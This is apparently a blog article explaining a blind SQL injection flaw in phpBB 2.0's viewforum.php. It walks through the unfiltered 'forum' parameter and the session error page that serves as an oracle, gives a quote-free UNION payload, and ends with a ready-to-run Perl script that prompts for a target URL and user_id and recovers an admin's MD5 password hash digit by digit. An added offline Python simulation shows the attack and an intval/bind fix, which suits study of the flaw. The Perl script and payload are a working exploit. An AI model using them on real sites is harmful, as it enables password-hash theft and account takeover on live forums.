PHP Injection Example

5 years ago  |  Reads: 304  |  Language: PHP

It is hard to find a complete article on PHP injection with working exploit code online, so I spent a few weeks grinding through MySQL and PHP myself. Here are my notes; I hope they spark some discussion.

Most readers are already very familiar with ASP injection. PHP injection is harder than ASP: PHP's magic_quotes_gpc option is a real headache, so the injected string must not contain any quotes, and PHP is mostly paired with MySQL, whose feature limitations (the MySQL versions of the day had no subqueries, for example) prevent SQL injection attacks to some degree when seen from another angle. So here I give one concrete example, using phpBB 2.0:
In viewforum.php there is a variable that is not filtered:
if ( isset($HTTP_GET_VARS[POST_FORUM_URL]) || isset($HTTP_POST_VARS[POST_FORUM_URL]) )
{
    // the "f" parameter is cast to an integer, so this branch is safe
    $forum_id = ( isset($HTTP_GET_VARS[POST_FORUM_URL]) ) ? intval($HTTP_GET_VARS[POST_FORUM_URL]) : intval($HTTP_POST_VARS[POST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
    // the legacy "forum" parameter is taken verbatim: no intval(), no filtering
    $forum_id = $HTTP_GET_VARS['forum'];
}
else
{
    $forum_id = '';
}
That forum parameter is the one. A little further down it goes straight into a query:
if ( !empty($forum_id) )
{
    // $forum_id is interpolated unquoted, so no quote is needed to break out
    $sql = "SELECT *
        FROM " . FORUMS_TABLE . "
        WHERE forum_id = $forum_id";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
    }
}
else
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

If this were ASP, most people would know how to inject it by now. If the forum named by forum_id does not exist, the query returns no rows (a query that fails outright, for example because it is malformed, gives 'Could not obtain forums information' instead); the fetch below then finds nothing, 'Forum_not_exist' is returned, and the code that follows never runs:
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id);   // **** the key line: $forum_id is reused here

The key is the line marked with asterisks. session_pagestart($user_ip, $thispage_id) is a function defined in session.php; the code is too long to reproduce in full, so read it yourself if you are interested. What matters is that it in turn calls session_begin(), as session_begin($user_id, $user_ip, $thispage_id, TRUE), which is defined in the same file and contains the following code:
$sql = "UPDATE " . SESSIONS_TABLE . "
    SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id, session_logged_in = $login
    WHERE session_id = '" . $session_id . "'
        AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) || !$db->sql_affectedrows() )
{
    $session_id = md5(uniqid($user_ip));

    // $page_id (our $forum_id) is interpolated unquoted a second time
    $sql = "INSERT INTO " . SESSIONS_TABLE . "
        (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in)
        VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__, $sql);
    }
}

Here session_page is defined in MySQL as an integer column, and its value $page_id is our $forum_id. If what gets inserted is not an integer the query fails and the message 'Error creating new session : session_begin' is shown. (Strictly speaking, once the injected text is interpolated unquoted into the UPDATE and INSERT above, both statements are malformed SQL and fail regardless of the column type; the observable result is the same error page.) So the value given to $forum_id matters a great deal, and I set it to:

-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57

No quotes at all! (The UNION needs one column per column of the forums table, 22 in phpBB 2.0.) Although it names a forum_id that does not exist, the query result is not necessarily empty: the UNION branch returns a row exactly when the first character of the password hash of the user with user_id 2 has ASCII value 57 (the digit '9'). If it does, the first query returns a row, the fetch succeeds, execution reaches the problematic session_pagestart, the non-integer value is inserted, the insert fails, and 'Error creating new session : session_begin' is displayed, which tells you the first character was guessed correctly. The remaining positions work the same way.
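The oracle just described, and the position-by-position extraction loop it enables, reproduced offline as an added example. This is not code from the article or from phpBB: it is an in-memory SQLite stand-in for the vulnerable PHP flow (a forum lookup followed by a session insert, both with the parameter interpolated unquoted), the same three response strings, and a hardened variant that casts and binds the parameter. Table names are the phpBB ones; the column layout is an assumption, and because the stand-in forums table has 3 columns the UNION uses 3 values instead of the 22 the real phpBB 2.0 table needs. MySQL's ord() is registered as a user function (SQLite lacks it) and substring() is written as substr(), which both databases accept. The stored hash is a constructed sample.

```python
"""Blind SQL injection via the phpBB 2.0 viewforum.php error oracle, simulated offline."""
import hashlib
import sqlite3

HEX_CHARS = "0123456789abcdef"  # alphabet of an MD5 hex digest

# Constructed sample data: user_id 2 stores the MD5 of "secret" (assumption, not real data).
SAMPLE_HASH = hashlib.md5(b"secret").hexdigest()


def make_db():
    """In-memory stand-in for the phpBB tables (column layout is an assumption)."""
    db = sqlite3.connect(":memory:")
    # MySQL has ord(); SQLite does not, so register an equivalent.
    db.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
    db.executescript(
        """
        CREATE TABLE phpbb_forums (forum_id INTEGER, forum_name TEXT, forum_desc TEXT);
        INSERT INTO phpbb_forums VALUES (1, 'General', 'chat');
        CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT);
        CREATE TABLE phpbb_sessions (session_id TEXT, session_page INTEGER);
        """
    )
    db.execute("INSERT INTO phpbb_users VALUES (2, 'admin', ?)", (SAMPLE_HASH,))
    return db


def view_forum_vulnerable(db, forum):
    """Mirror of viewforum.php + session_begin(): $forum_id interpolated unquoted twice."""
    try:
        row = db.execute(f"SELECT * FROM phpbb_forums WHERE forum_id = {forum}").fetchone()
    except sqlite3.Error:
        return "Could not obtain forums information"
    if row is None:
        return "Forum_not_exist"
    try:  # session_begin(): session_page = $page_id, again unquoted
        db.execute(f"INSERT INTO phpbb_sessions VALUES ('sid', {forum})")
    except sqlite3.Error:
        return "Error creating new session : session_begin"
    return "forum page"


def view_forum_fixed(db, forum):
    """Hardened flow: cast to int (as the POST_FORUM_URL branch already does) and bind."""
    try:
        forum_id = int(forum)
    except ValueError:
        return "Forum_not_exist"
    row = db.execute("SELECT * FROM phpbb_forums WHERE forum_id = ?", (forum_id,)).fetchone()
    if row is None:
        return "Forum_not_exist"
    db.execute("INSERT INTO phpbb_sessions VALUES ('sid', ?)", (forum_id,))
    return "forum page"


def payload(user_id, pos, char):
    """The article's payload shape: a non-existent forum_id UNIONed with a row that
    only exists when the guessed character matches. No quotes anywhere."""
    return (f"-1 union select 1,1,1 from phpbb_users where user_id={user_id} "
            f"and ord(substr(user_password,{pos},1))={ord(char)}")


def extract_hash(app, db, user_id, length=32):
    """Recover the hash one hex digit at a time, using the session error page as oracle."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX_CHARS:
            if "Error creating new session" in app(db, payload(user_id, pos, c)):
                recovered += c
                break
        else:
            break  # no candidate matched: the oracle is gone (hardened code path)
    return recovered


def demo():
    """Run the extraction against both flows; returns (vulnerable_result, fixed_result)."""
    db = make_db()
    return extract_hash(view_forum_vulnerable, db, 2), extract_hash(view_forum_fixed, db, 2)


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable flow leaked:", vulnerable)
    print("hardened flow leaked:  ", repr(fixed))
```

Against the vulnerable flow the loop recovers all 32 hex digits with at most 16 requests per position; against the hardened flow int() rejects the payload before any SQL runs, the oracle never fires and nothing is recovered. Binding the parameter is the general fix; intval() is the minimal one, and it is exactly what the other branch of viewforum.php already did.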

Without that error message I think it would be very hard to tell whether the injection had succeeded even when it had; error messages really are helpful. That is the whole story. Below is a test script; with small changes it applies to other similar cases of guessing an MD5 password hash. I use the English-language error string as the match condition; for the Chinese or other language packs just change that string.

#!/usr/bin/perl
# phpbb viewforum.php blind injection: guesses the 32 hex digits of a user's
# MD5 password hash one at a time, using the session error page as the oracle.
use strict;
use warnings;
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;

my $ua = LWP::UserAgent->new;

print " ***\n";
print " phpbb viewforum.php exp\n";
print " code by pinkeyes\n";
print " www.icehack.com\n";
print " ****\n";
print "please enter the weak file's url:\n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.php\n";
my $adr = <STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack\n";
my $u = <STDIN>;
chomp($u);
print "work starting,please wait!\n";

# Candidate characters as ASCII codes: 0-9 and a-f, the alphabet of an MD5 hex digest
my @pink = (48..57, 97..102);
my $pwd = "";

for (my $j = 1; $j <= 32; $j++) {            # one pass per hex digit of the hash
    for (my $i = 0; $i < @pink; $i++) {
        # Same payload as above: 22 ones for the 22 columns of phpbb_forums, no quotes
        my $url = $adr . "?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
        my $request  = HTTP::Request->new('GET', $url);
        my $response = $ua->request($request);

        if ($response->is_success) {
            # The session error only appears when the guessed character is right
            if ($response->content =~ /Error creating new session/) {
                $pwd .= chr($pink[$i]);
                print "$pwd\n";
                last;   # each position has exactly one match, no need to try the rest
            }
        }
    }
}

if ($pwd ne "") {
    print "successfully,The password is $pwd,good luck\n";
} else {
    print "bad luck,work failed!\n";
}

As for the recent phpBB 2.0.6 search.php issue, an exploit only needs small changes to the code above. If there are mistakes, please point them out at www.icehack.com.
